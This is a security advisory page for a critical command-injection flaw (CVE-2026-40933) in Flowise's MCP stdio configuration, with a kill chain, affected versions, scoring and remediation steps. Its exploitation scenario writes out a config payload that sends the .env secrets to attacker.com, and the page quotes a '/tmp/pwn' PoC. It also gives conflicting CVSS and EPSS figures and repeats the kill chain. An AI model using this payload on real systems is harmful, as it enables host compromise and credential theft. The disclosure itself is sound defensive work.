Flowise: RCE via MCP stdio command injection — CRITICAL (CVE-2026-40933)

CISO Take

CVE-2026-40933 is a perfect CVSS 10.0 OS command injection in Flowise, the popular no-code AI agent builder, allowing any authenticated user to execute arbitrary commands on the underlying host by abusing the Custom MCP stdio server configuration. Despite input sanitization controls (`validateCommandInjection`, `validateArgsForLocalFileAccess`) and an allowlist of safe commands, an attacker trivially bypasses these by pairing the whitelisted `npx` binary with the `-c` execution flag — a one-line PoC is publicly documented in the advisory. With network-accessible attack vector, low privileges required, no user interaction, and Changed scope, any Flowise instance accessible to more than a single trusted operator — including multi-tenant enterprise deployments or internally exposed dev environments — faces immediate full host compromise risk. Upgrade to flowise >= 3.1.0 immediately; if patching is not possible, restrict the `/canvas` configuration UI to admin-only roles at the network or auth layer and audit existing MCP server configurations for malicious entries.

Sources: GitHub Advisory NVD ATLAS ox.security blog

What is the risk?

Maximum severity (CVSS 10.0). The vulnerability is trivially exploitable: the PoC requires no specialized knowledge beyond a valid Flowise account. The bypass technique — using an allowlisted binary with a shell execution flag — is a classic allowlist evasion that even non-expert attackers can replicate from the public advisory. Flowise is widely deployed as a self-hosted AI agent builder in enterprise and startup environments, often with multiple users having configuration access. The Changed scope in the CVSS vector means successful exploitation breaks out of the application context and compromises the underlying OS, dramatically escalating blast radius beyond the AI platform itself.

Attack Kill Chain

Initial Access

Attacker authenticates to Flowise with any valid low-privilege account — developer, analyst, or trial user — gaining access to the canvas configuration UI.

AML.T0012

Configuration Injection

Attacker creates a Custom MCP stdio server entry using `{"command": "npx", "args": ["-c", "<payload>"]}`, bypassing `validateCommandInjection` by using the whitelisted `npx` binary with a shell execution flag.

AML.T0081

Command Execution

When Flowise initializes the MCP server, the Node.js process spawns `npx -c <payload>` as a child process on the underlying OS, executing arbitrary attacker-controlled commands.

AML.T0050

Host Compromise

Attacker exfiltrates environment variables (LLM API keys, DB credentials), establishes a reverse shell for persistence, and pivots to adjacent services on the internal network.

AML.T0072

Initial Access

Attacker authenticates to Flowise with any valid low-privilege account — developer, analyst, or trial user — gaining access to the canvas configuration UI.

AML.T0012

Configuration Injection

Attacker creates a Custom MCP stdio server entry using `{"command": "npx", "args": ["-c", "<payload>"]}`, bypassing `validateCommandInjection` by using the whitelisted `npx` binary with a shell execution flag.

AML.T0081

Command Execution

When Flowise initializes the MCP server, the Node.js process spawns `npx -c <payload>` as a child process on the underlying OS, executing arbitrary attacker-controlled commands.

AML.T0050

Host Compromise

Attacker exfiltrates environment variables (LLM API keys, DB credentials), establishes a reverse shell for persistence, and pivots to adjacent services on the internal network.

AML.T0072

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
flowise	npm	<= 3.0.13	`3.1.0`
flowise-components	npm	<= 3.0.13	`3.1.0`

Severity & Risk

CVSS 3.1

9.9 / 10

EPSS

0.1%

chance of exploitation in 30 days

Higher than 22% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR Low

UI None

S Changed

C High

I High

A High

What should I do?

5 steps

Patch immediately

Upgrade flowise and flowise-components to >= 3.1.0.
Audit existing MCP configs

Query the database for any MCP stdio server entries with npx -c, node -e, python -c, bash -c, or similar shell execution flags in args.
If patching is delayed

Restrict access to localhost:3000/canvas (or equivalent) to a dedicated admin RBAC role; block non-admin users from reaching MCP configuration endpoints at the reverse proxy layer.
Check for compromise

Review OS process history for unexpected child processes spawned by the Flowise Node.js process, and audit /tmp/ and home directories for attacker-created files (the PoC creates /tmp/pwn).
Rotate secrets

Any environment variables accessible to the Flowise process (LLM API keys, DB credentials, cloud keys) should be rotated as a precaution if the instance had multi-user access.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Auth Bypass Agent Plugin Framework AML.T0010.005 - AI Agent Tool AML.T0012 - Valid Accounts AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell AML.T0081 - Modify AI Agent Configuration

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

A.6.2.6 - Human oversight mechanisms A.8.7 - Cybersecurity of AI systems

NIST AI RMF

MANAGE 2.4 - Residual risks are monitored and managed MAP 5.1 - Likelihood of vulnerabilities or other conditions that may undermine AI system trustworthiness is assessed

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-40933?

CVE-2026-40933 is a perfect CVSS 10.0 OS command injection in Flowise, the popular no-code AI agent builder, allowing any authenticated user to execute arbitrary commands on the underlying host by abusing the Custom MCP stdio server configuration. Despite input sanitization controls (`validateCommandInjection`, `validateArgsForLocalFileAccess`) and an allowlist of safe commands, an attacker trivially bypasses these by pairing the whitelisted `npx` binary with the `-c` execution flag — a one-line PoC is publicly documented in the advisory. With network-accessible attack vector, low privileges required, no user interaction, and Changed scope, any Flowise instance accessible to more than a single trusted operator — including multi-tenant enterprise deployments or internally exposed dev environments — faces immediate full host compromise risk. Upgrade to flowise >= 3.1.0 immediately; if patching is not possible, restrict the `/canvas` configuration UI to admin-only roles at the network or auth layer and audit existing MCP server configurations for malicious entries.

Is CVE-2026-40933 actively exploited?

No confirmed active exploitation of CVE-2026-40933 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-40933?

1. **Patch immediately**: Upgrade `flowise` and `flowise-components` to >= 3.1.0. 2. **Audit existing MCP configs**: Query the database for any MCP stdio server entries with `npx -c`, `node -e`, `python -c`, `bash -c`, or similar shell execution flags in args. 3. **If patching is delayed**: Restrict access to `localhost:3000/canvas` (or equivalent) to a dedicated admin RBAC role; block non-admin users from reaching MCP configuration endpoints at the reverse proxy layer. 4. **Check for compromise**: Review OS process history for unexpected child processes spawned by the Flowise Node.js process, and audit `/tmp/` and home directories for attacker-created files (the PoC creates `/tmp/pwn`). 5. **Rotate secrets**: Any environment variables accessible to the Flowise process (LLM API keys, DB credentials, cloud keys) should be rotated as a precaution if the instance had multi-user access.

What systems are affected by CVE-2026-40933?

This vulnerability affects the following AI/ML architecture patterns: AI agent frameworks, LLM orchestration platforms, MCP (Model Context Protocol) deployments, No-code/low-code AI builder platforms, Multi-tenant AI development environments.

What is the CVSS score for CVE-2026-40933?

CVE-2026-40933 has a CVSS v3.1 base score of 9.9 (CRITICAL). The EPSS exploitation probability is 0.07%.

AI Security Impact

Affected AI Architectures

AI agent frameworksLLM orchestration platformsMCP (Model Context Protocol) deploymentsNo-code/low-code AI builder platformsMulti-tenant AI development environments

MITRE ATLAS Techniques

AML.T0010.005 AI Agent Tool

AML.T0012 Valid Accounts

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0053 AI Agent Tool Invocation

AML.T0072 Reverse Shell

AML.T0081 Modify AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15, Article 9

ISO 42001: A.6.2.6, A.8.7

NIST AI RMF: MANAGE 2.4, MAP 5.1

OWASP LLM Top 10: LLM03:2025, LLM06:2025

Technical Details

Original Advisory

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, due to unsafe serialization of stdio commands in the MCP adapter, an authenticated attacker can add an MCP stdio server with an arbitrary command, achieving command execution. The vulnerability lies in a bug in the input sanitization from the “Custom MCP” configuration in http://localhost:3000/canvas - where any user can add a new MCP, when doing so - adding a new MCP using stdio, the user can add any command, even though your code have input sanitization checks such as validateCommandInjection and validateArgsForLocalFileAccess, and a list of predefined specific safe commands - these commands, for example "npx" can be combined with code execution arguments ("-c touch /tmp/pwn") that enable direct code execution on the underlying OS. This vulnerability is fixed in 3.1.0.

Exploitation Scenario

An attacker with a low-privilege Flowise account — such as a developer or analyst in an organization using shared Flowise for AI workflow prototyping — navigates to `/canvas` and opens the Custom MCP configuration panel. They create a new MCP entry with `{"command": "npx", "args": ["-c", "curl http://attacker.com/exfil?data=$(cat /opt/flowise/.env | base64)"]}`. When the MCP server is initialized (either immediately on save or on next workflow execution), Flowise passes this through its sanitization layer — which permits `npx` as a safe command — and spawns the process, executing the attacker's payload as the Flowise service account. The attacker receives all environment variables including LLM API keys, database credentials, and any secrets loaded into the process. From there, they deploy a reverse shell for persistent access and move laterally to the database and other internal services.